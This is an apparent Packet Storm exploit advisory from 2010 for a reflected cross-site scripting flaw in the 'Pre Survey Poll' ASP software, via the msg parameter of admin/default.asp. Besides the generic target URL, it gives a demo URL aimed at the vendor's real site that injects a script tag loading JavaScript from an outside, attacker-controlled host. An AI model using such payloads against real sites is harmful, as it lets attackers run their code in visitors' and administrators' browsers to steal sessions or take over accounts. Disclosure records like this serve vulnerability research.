Pre Survey Poll Cross Site Scripting

2010-11-14T00:00:00
ID PACKETSTORM:95819
Type packetstorm
Reporter Cru3l.b0y
Modified 2010-11-14T00:00:00

Description

                                        
                                            `In The Name Of GOD  
[+] Exploit Title: PRE SURVEY POLL XSS Vulnerability  
[+] Date: 2010-11-13  
[+] Author : Cru3l.b0y  
[+] Software Link: http://www.preproject.com/poll.asp  
[+] Price : 28.00$  
[+] Contact : Cru3l.b0y@gmail.com  
[+] Website : WwW.PenTesters.IR  
[+] Greeting: Behzad, Ahmad, ...  
  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
[+] Exploit :   
  
http://target/path/admin/default.asp?msg=xss  
  
  
[+] Demo: http://www.preproject.com/poll/admin/default.asp?msg=<script src='http://cru3lb0y.persiangig.com/XSS.JS'></script>  
  
  
  
`